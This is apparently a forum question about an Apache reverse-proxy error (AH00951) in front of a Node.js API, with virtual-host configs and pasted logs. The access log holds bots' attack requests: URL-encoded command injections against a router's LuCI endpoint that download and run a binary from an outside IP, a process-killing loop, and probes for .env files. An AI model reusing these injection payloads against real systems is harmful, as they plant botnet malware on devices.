AH00951: HTTP: backend socket is disconnected in apache2 logs
Hi i'm using a reverse proxy for my node.js api's as configured by a fiverr devops gig.
here is my api.domain.conf:
<VirtualHost *:80>
    ServerName api.domain.net
    RequestReadTimeout header=60-500,MinRate=500 body=60-500,MinRate=500
    ProxyPreserveHost On
    ProxyPass / http://86.xx.x.xxx:3000/
    ProxyPassReverse / http://86.xx.x.xxx:3000/

   # Block access to sensitive files
    <FilesMatch "^\.git">
        Require all denied
    </FilesMatch>

    ErrorLog ${APACHE_LOG_DIR}/api_error.log
    CustomLog ${APACHE_LOG_DIR}/api_access.log combined

    RewriteEngine on
    RewriteCond %{SERVER_NAME} =api.domain.net
    RewriteRule ^ https://%{SERVER_NAME}%{REQUEST_URI} [END,NE,R=permanent]

    Redirect permanent / https://api.domain.net/
</VirtualHost>

here is my api.domain.net-le-ssl.conf contents:
<IfModule mod_ssl.c>
<VirtualHost *:443>
    ServerName api.domain.net
    ProxyRequests Off
    RequestReadTimeout header=60-500,MinRate=500 body=60-500,MinRate=500
    ProxyPass / http://86.xx.x.xxx:3000/
    ProxyPassReverse / http://86.xx.x.xxx:3000/
      <Proxy *>
        Order deny,allow
        Allow from all
    </Proxy>
    SSLEngine on
    Include /etc/letsencrypt/options-ssl-apache.conf
    SSLCertificateFile /etc/letsencrypt/live/api.domain.net/fullchain.pem
    SSLCertificateKeyFile /etc/letsencrypt/live/api.domain.net/privkey.pem
</VirtualHost>
</IfModule>

here is the api-error.log:
[Sun Jul 07 04:04:40.209370 2024] [proxy:debug] [pid 366025] proxy_util.c(1993): AH00927: initializing worker http://86.48.6.205:3000/ local
[Sun Jul 07 04:04:40.209413 2024] [proxy:debug] [pid 366025] proxy_util.c(2044): AH00931: initialized single connection worker in child 366025 for (86.48.6.205)
[Sun Jul 07 04:05:34.841991 2024] [authz_core:debug] [pid 362818] mod_authz_core.c(845): [client 185.224.128.43:49806] AH01628: authorization result: granted (no directives)
[Sun Jul 07 04:05:34.842344 2024] [proxy:debug] [pid 362818] mod_proxy.c(1254): [client 185.224.128.43:49806] AH01143: Running scheme http handler (attempt 0)
[Sun Jul 07 04:05:34.842511 2024] [proxy:debug] [pid 362818] proxy_util.c(2341): AH00942: HTTP: has acquired connection for (86.48.6.205)
[Sun Jul 07 04:05:34.842638 2024] [proxy:debug] [pid 362818] proxy_util.c(2395): [client 185.224.128.43:49806] AH00944: connecting http://86.48.6.205:3000/ to 86.48.6.205:3000
[Sun Jul 07 04:05:34.842650 2024] [proxy:debug] [pid 362818] proxy_util.c(2604): [client 185.224.128.43:49806] AH00947: connected / to 86.48.6.205:3000
[Sun Jul 07 04:05:34.843443 2024] [proxy:debug] [pid 362818] proxy_util.c(2905): AH00951: HTTP: backend socket is disconnected.
[Sun Jul 07 04:05:34.843781 2024] [proxy:debug] [pid 362818] proxy_util.c(3070): AH02824: HTTP: connection established with 86.48.6.205:3000 (86.48.6.205)
[Sun Jul 07 04:05:34.843807 2024] [proxy:debug] [pid 362818] proxy_util.c(3256): AH00962: HTTP: connection complete to 86.48.6.205:3000 (86.48.6.205)
[Sun Jul 07 04:05:34.894391 2024] [proxy:debug] [pid 362818] proxy_util.c(2356): AH00943: http: has released connection for (86.48.6.205)
[Sun Jul 07 04:06:47.410818 2024] [authz_core:debug] [pid 362975] mod_authz_core.c(845): [client 141.98.83.197:33246] AH01628: authorization result: granted (no directives)
[Sun Jul 07 04:06:47.410910 2024] [proxy:debug] [pid 362975] mod_proxy.c(1254): [client 141.98.83.197:33246] AH01143: Running scheme http handler (attempt 0)
[Sun Jul 07 04:06:47.411026 2024] [proxy:debug] [pid 362975] proxy_util.c(2341): AH00942: HTTP: has acquired connection for (86.48.6.205)
[Sun Jul 07 04:06:47.411164 2024] [proxy:debug] [pid 362975] proxy_util.c(2395): [client 141.98.83.197:33246] AH00944: connecting http://86.48.6.205:3000/ to 86.48.6.205:3000
[Sun Jul 07 04:06:47.411175 2024] [proxy:debug] [pid 362975] proxy_util.c(2604): [client 141.98.83.197:33246] AH00947: connected / to 86.48.6.205:3000
[Sun Jul 07 04:06:47.411917 2024] [proxy:debug] [pid 362975] proxy_util.c(2905): AH00951: HTTP: backend socket is disconnected.
[Sun Jul 07 04:06:47.412119 2024] [proxy:debug] [pid 362975] proxy_util.c(3070): AH02824: HTTP: connection established with 86.48.6.205:3000 (86.48.6.205)
[Sun Jul 07 04:06:47.412138 2024] [proxy:debug] [pid 362975] proxy_util.c(3256): AH00962: HTTP: connection complete to 86.48.6.205:3000 (86.48.6.205)
[Sun Jul 07 04:06:47.416468 2024] [proxy:debug] [pid 362975] proxy_util.c(2356): AH00943: http: has released connection for (86.48.6.205)
[Sun Jul 07 04:06:48.373260 2024] [proxy:debug] [pid 366036] proxy_util.c(1936): AH00925: initializing worker http://86.48.6.205:3000/ shared
[Sun Jul 07 04:06:48.373268 2024] [proxy:debug] [pid 366036] proxy_util.c(1993): AH00927: initializing worker http://86.48.6.205:3000/ local
[Sun Jul 07 04:06:48.373297 2024] [proxy:debug] [pid 366036] proxy_util.c(2044): AH00931: initialized single connection worker in child 366036 for (86.48.6.205)
[Sun Jul 07 04:12:00.242015 2024] [authz_core:debug] [pid 364966] mod_authz_core.c(845): [client 146.190.140.179:52732] AH01628: authorization result: granted (no directives)
[Sun Jul 07 04:12:00.242124 2024] [proxy:debug] [pid 364966] mod_proxy.c(1254): [client 146.190.140.179:52732] AH01143: Running scheme http handler (attempt 0)
[Sun Jul 07 04:12:00.242132 2024] [proxy:debug] [pid 364966] proxy_util.c(2341): AH00942: HTTP: has acquired connection for (86.48.6.205)
[Sun Jul 07 04:12:00.242226 2024] [proxy:debug] [pid 364966] proxy_util.c(2395): [client 146.190.140.179:52732] AH00944: connecting http://86.48.6.205:3000/ to 86.48.6.205:3000
[Sun Jul 07 04:12:00.242588 2024] [proxy:debug] [pid 364966] proxy_util.c(2604): [client 146.190.140.179:52732] AH00947: connected / to 86.48.6.205:3000
[Sun Jul 07 04:12:00.242721 2024] [proxy:debug] [pid 364966] proxy_util.c(3070): AH02824: HTTP: connection established with 86.48.6.205:3000 (86.48.6.205)
[Sun Jul 07 04:12:00.242738 2024] [proxy:debug] [pid 364966] proxy_util.c(3256): AH00962: HTTP: connection complete to 86.48.6.205:3000 (86.48.6.205)
[Sun Jul 07 04:12:00.254158 2024] [proxy:debug] [pid 364966] proxy_util.c(2356): AH00943: http: has released connection for (86.48.6.205)
[Sun Jul 07 04:12:00.254201 2024] [deflate:debug] [pid 364966] mod_deflate.c(854): [client 146.190.140.179:52732] AH01384: Zlib: Compressed 29 to 36 : URL /
[Sun Jul 07 04:24:26.085392 2024] [proxy:debug] [pid 366249] proxy_util.c(1936): AH00925: initializing worker http://86.48.6.205:3000/ shared
[Sun Jul 07 04:24:26.085416 2024] [proxy:debug] [pid 366249] proxy_util.c(1993): AH00927: initializing worker http://86.48.6.205:3000/ local
[Sun Jul 07 04:24:26.085432 2024] [proxy:debug] [pid 366249] proxy_util.c(2044): AH00931: initialized single connection worker in child 366249 for (86.48.6.205)
[Sun Jul 07 04:24:26.101073 2024] [proxy:debug] [pid 366250] proxy_util.c(1936): AH00925: initializing worker http://86.48.6.205:3000/ shared
[Sun Jul 07 04:24:26.101371 2024] [proxy:debug] [pid 366250] proxy_util.c(1993): AH00927: initializing worker http://86.48.6.205:3000/ local
[Sun Jul 07 04:24:26.101992 2024] [proxy:debug] [pid 366250] proxy_util.c(2044): AH00931: initialized single connection worker in child 366250 for (86.48.6.205)
[Sun Jul 07 04:24:26.102192 2024] [proxy:debug] [pid 366251] proxy_util.c(1936): AH00925: initializing worker http://86.48.6.205:3000/ shared
[Sun Jul 07 04:24:26.102198 2024] [proxy:debug] [pid 366251] proxy_util.c(1993): AH00927: initializing worker http://86.48.6.205:3000/ local
[Sun Jul 07 04:24:26.102211 2024] [proxy:debug] [pid 366251] proxy_util.c(2044): AH00931: initialized single connection worker in child 366251 for (86.48.6.205)
[Sun Jul 07 04:24:26.104371 2024] [proxy:debug] [pid 366252] proxy_util.c(1936): AH00925: initializing worker http://86.48.6.205:3000/ shared
[Sun Jul 07 04:24:26.104382 2024] [proxy:debug] [pid 366252] proxy_util.c(1993): AH00927: initializing worker http://86.48.6.205:3000/ local
[Sun Jul 07 04:24:26.104396 2024] [proxy:debug] [pid 366252] proxy_util.c(2044): AH00931: initialized single connection worker in child 366252 for (86.48.6.205)
[Sun Jul 07 04:24:26.126627 2024] [proxy:debug] [pid 366253] proxy_util.c(1936): AH00925: initializing worker http://86.48.6.205:3000/ shared
[Sun Jul 07 04:24:26.126735 2024] [proxy:debug] [pid 366253] proxy_util.c(1993): AH00927: initializing worker http://86.48.6.205:3000/ local
[Sun Jul 07 04:24:26.127290 2024] [proxy:debug] [pid 366253] proxy_util.c(2044): AH00931: initialized single connection worker in child 366253 for (86.48.6.205)
[Sun Jul 07 04:28:04.130094 2024] [proxy:debug] [pid 366295] proxy_util.c(1936): AH00925: initializing worker http://86.48.6.205:3000/ shared
[Sun Jul 07 04:28:04.130109 2024] [proxy:debug] [pid 366295] proxy_util.c(1993): AH00927: initializing worker http://86.48.6.205:3000/ local
[Sun Jul 07 04:28:04.130135 2024] [proxy:debug] [pid 366295] proxy_util.c(2044): AH00931: initialized single connection worker in child 366295 for (86.48.6.205)

here is the api-access.log:
87.121.69.61 - - [07/Jul/2024:00:13:23 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 718 "http://86.48.6.205:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.148.10.174 - - [07/Jul/2024:00:15:52 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 668 "-" "Go-http-client/1.1"
45.148.10.174 - - [07/Jul/2024:00:15:52 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 666 "-" "Go-http-client/1.1"
45.156.129.100 - - [07/Jul/2024:00:26:11 +0200] "GET / HTTP/1.1" 200 492 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
45.148.10.251 - - [07/Jul/2024:00:26:19 +0200] "GET / HTTP/1.1" 200 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
127.0.0.1 - - [07/Jul/2024:00:54:51 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1f (internal dummy connection)"
127.0.0.1 - - [07/Jul/2024:00:55:57 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1f (internal dummy connection)"
127.0.0.1 - - [07/Jul/2024:00:57:21 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1f (internal dummy connection)"
87.121.69.61 - - [07/Jul/2024:01:02:19 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 503 566 "http://86.48.6.205:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
127.0.0.1 - - [07/Jul/2024:01:06:04 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1f (internal dummy connection)"
127.0.0.1 - - [07/Jul/2024:01:08:43 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1f (internal dummy connection)"
127.0.0.1 - - [07/Jul/2024:01:09:37 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1f (internal dummy connection)"
127.0.0.1 - - [07/Jul/2024:01:09:38 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1f (internal dummy connection)"
127.0.0.1 - - [07/Jul/2024:01:14:38 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1f (internal dummy connection)"
185.54.231.55 - - [07/Jul/2024:01:16:13 +0200] "GET /admin/login.asp HTTP/1.1" 404 717 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
185.54.231.55 - - [07/Jul/2024:01:16:28 +0200] "GET /admin/login.asp HTTP/1.1" 404 585 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
103.197.112.121 - - [07/Jul/2024:01:29:21 +0200] "POST /HNAP1/ HTTP/1.0" 400 485 "-" "-"
91.92.247.56 - - [07/Jul/2024:01:41:57 +0200] "GET /.env HTTP/1.1" 404 698 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
91.92.247.56 - - [07/Jul/2024:01:41:57 +0200] "POST / HTTP/1.1" 404 697 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.150.26.251 - - [07/Jul/2024:01:47:30 +0200] "GET / HTTP/1.1" 200 486 "-" "-"
185.191.126.213 - - [07/Jul/2024:02:08:14 +0200] "GET / HTTP/1.1" 200 488 "-" "-"
45.148.10.174 - - [07/Jul/2024:02:26:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 666 "-" "Go-http-client/1.1"
45.148.10.174 - - [07/Jul/2024:02:26:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 668 "-" "Go-http-client/1.1"
141.98.83.197 - - [07/Jul/2024:02:31:22 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 666 "-" "Go-http-client/1.1"
141.98.83.197 - - [07/Jul/2024:02:31:22 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 666 "-" "Go-http-client/1.1"
127.0.0.1 - - [07/Jul/2024:02:35:33 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1f (internal dummy connection)"
127.0.0.1 - - [07/Jul/2024:02:36:27 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1f (internal dummy connection)"
127.0.0.1 - - [07/Jul/2024:02:40:33 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1f (internal dummy connection)"
64.62.156.82 - - [07/Jul/2024:03:03:14 +0200] "GET / HTTP/1.1" 200 400 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15"
64.62.156.85 - - [07/Jul/2024:03:05:25 +0200] "GET /favicon.ico HTTP/1.1" 404 565 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
64.62.156.81 - - [07/Jul/2024:03:06:05 +0200] "GET /geoserver/web/ HTTP/1.1" 404 570 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15"
127.0.0.1 - - [07/Jul/2024:03:13:13 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1f (internal dummy connection)"
85.187.1.59 - - [07/Jul/2024:03:13:14 +0200] "GET / HTTP/1.1" 200 427 "-" "-"
127.0.0.1 - - [07/Jul/2024:03:13:42 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1f (internal dummy connection)"
92.249.48.202 - - [07/Jul/2024:03:16:33 +0200] "GET / HTTP/1.1" 200 458 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [07/Jul/2024:03:17:25 +0200] "GET / HTTP/1.1" 200 398 "-" "-"
127.0.0.1 - - [07/Jul/2024:03:17:46 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1f (internal dummy connection)"
65.49.20.69 - - [07/Jul/2024:03:30:32 +0200] "\x16\x03\x01" 400 492 "-" "-"
83.97.73.245 - - [07/Jul/2024:03:33:06 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 487 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
127.0.0.1 - - [07/Jul/2024:03:48:41 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1f (internal dummy connection)"
45.79.181.179 - - [07/Jul/2024:03:50:28 +0200] "\x16\x03\x01" 400 492 "-" "-"
46.174.191.31 - - [07/Jul/2024:04:01:56 +0200] "GET / HTTP/1.0" 301 546 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"
185.224.128.43 - - [07/Jul/2024:04:05:34 +0200] "GET / HTTP/1.1" 200 544 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.83.197 - - [07/Jul/2024:04:06:47 +0200] "GET / HTTP/1.1" 200 540 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
127.0.0.1 - - [07/Jul/2024:04:11:40 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1f (internal dummy connection)"
146.190.140.179 - - [07/Jul/2024:04:12:00 +0200] "GET / HTTP/1.1" 200 589 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
127.0.0.1 - - [07/Jul/2024:04:12:28 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) OpenSSL/1.1.1f (internal dummy connection)"
185.235.128.155 - - [07/Jul/2024:04:34:37 +0200] "GET /.env HTTP/1.1" 404 700 "-" "python-requests/2.26.0"
185.235.128.155 - - [07/Jul/2024:04:34:37 +0200] "POST / HTTP/1.1" 404 570 "-" "python-requests/2.26.0"

here is server error.log:
[Sun Jul 07 04:24:26.148825 2024] [http:info] [pid 366249] [client 165.232.66.142:50780] AH01587: Invalid Content-Length
[Sun Jul 07 04:24:26.149012 2024] [proxy_http:error] [pid 366249] (-102)Unknown error -102: [client 165.232.66.142:50780] AH01095: prefetch request body failed to 86.48.6.205:3000 (86.48.6.205) from 165.232.66.142 ()[Sun Jul 07 04:24:26.149036 2024] [proxy:debug] [pid 366249] proxy_util.c(2356): AH00943: HTTP: has released connection for (86.48.6.205)
[Sun Jul 07 04:24:26.149450 2024] [ssl:debug] [pid 366249] ssl_engine_io.c(1102): [client 165.232.66.142:50780] AH02001: Connection closed to child 0 with standard shutdown (server api.kaamresume.net:443)
[Sun Jul 07 04:28:03.571534 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:03.571617 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:04.129823 2024] [watchdog:debug] [pid 366295] mod_watchdog.c(566): AH02980: Watchdog: nothing configured?
[Sun Jul 07 04:28:04.129952 2024] [proxy:debug] [pid 366295] proxy_util.c(1936): AH00925: initializing worker proxy:reverse shared
[Sun Jul 07 04:28:04.129958 2024] [proxy:debug] [pid 366295] proxy_util.c(1993): AH00927: initializing worker proxy:reverse local
[Sun Jul 07 04:28:04.129992 2024] [proxy:debug] [pid 366295] proxy_util.c(2044): AH00931: initialized single connection worker in child 366295 for (*)
[Sun Jul 07 04:28:04.130138 2024] [proxy:debug] [pid 366295] proxy_util.c(1936): AH00925: initializing worker http://86.48.6.205:3000/ shared
[Sun Jul 07 04:28:04.130144 2024] [proxy:debug] [pid 366295] proxy_util.c(1993): AH00927: initializing worker http://86.48.6.205:3000/ local
[Sun Jul 07 04:28:04.130163 2024] [proxy:debug] [pid 366295] proxy_util.c(2044): AH00931: initialized single connection worker in child 366295 for (86.48.6.205)
[Sun Jul 07 04:28:04.307931 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:04.307964 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:04.577346 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:04.577373 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:04.832172 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:04.832200 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:04.832257 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:04.832261 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:05.112527 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:05.112559 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:05.374037 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:05.374106 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:05.658368 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:05.658397 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:05.903946 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:05.903984 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:06.160386 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:06.160416 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:06.425800 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:06.425825 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:06.710232 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:06.710257 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:06.953104 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:06.953130 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:07.194272 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:07.194342 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:07.434292 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:07.434318 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:07.674442 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:07.674468 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:08.337286 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:08.337321 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:08.577816 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
[Sun Jul 07 04:28:08.577842 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of <RequireAny>: granted
[Sun Jul 07 04:28:08.835541 2024] [authz_core:debug] [pid 366251] mod_authz_core.c(817): [client 149.88.106.146:34146] AH01626: authorization result of Require all granted: granted
